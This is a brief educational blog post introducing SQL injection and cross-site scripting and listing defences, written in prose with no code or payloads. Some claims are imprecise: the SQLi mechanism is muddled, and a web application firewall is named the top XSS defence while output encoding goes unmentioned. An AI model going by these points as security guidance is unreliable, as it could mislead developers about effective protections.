It’s been awhile since I focused on an aspect of cyber security so this week I want to briefly cover two types of cyber attacks that are often closely associated and sometimes mistaken as the same attack…
Firstly, let’s think about SQL Injection attacks (SQLi). With SQLi the hacker’s intent is to steal from a database, an attack very much focused on organisations rather than individual end users. The hacker seeks out an SQL-driven website with exposed vulnerabilities and infiltrates input data with a malicious SQL query. This malicious query is then validated once a user enters credentials in the website’s input fields (eg. username, password) and thus the hacker’s command is executed via the database. The hacker is granted access to the database and becomes an unwanted administrator; viewing, altering and stealing valuable or sensitive data from an organisation.
So what are the best practices to avoid SQLi?
Firstly, use parameterised statements. This is the most important defense method against SQLi, ensuring that maliciously created SQL queries cannot be executed. Do not use an SQL string query, the hacker can easily sabotage it by creating their own parameters to access the database! Secondly, ensure all data is encrypted at rest and in transit to make unauthorised access more difficult. Thirdly, and perhaps most obviously, make sure the principles of least privilege are being followed. When more users than necessary have credentials to access information, more ports of entry are available for hackers to exploit.
Moving on to Cross-site scripting…
With XXS, a hacker’s intent is to steal data from the end user rather than an organisation as the attack is focused on the client-side rather than the database level. The hacker begins by injecting a trusted website with malicious javascript. When an end user visits the trusted website, the malicious script is triggered. The user’s browser executes the malicious script and unknowingly forwards information such as cookie, credential and authentication tokens to the hacker.
How to protect against XSS:
For XSS, the number one defense mechanism is WAF (web application firewall). WAF allows you to control access to your content and also monitor HTTP and HTTPS requests, allowing you to block certain HTTP traffic to and from your website or application. WAF is also an important defence against SQLi attacks, blocking requests that appear to contain malicious SQL queries. So essentially, when protecting your database and end users, WAF is your go to defence mechanism.
To conclude, cyber attacks are multifaceted and continually increasing in sophistication. As we have seen from examining XSS and SQLi, attacks can be both aggressive and invasive yet initially go unnoticed, hiding behind trusted sites and recognised means of authentication. Security of design is a critical, ongoing process, employing multiple precautions and defence methods.
I hope I have given you a comprehensive introduction to XSS and SQLi and the means of preventing them. Look out for more of my blogs, aiming to provide concise and understandable introductions to many aspects of cyber and the cloud!
Ellie Woods 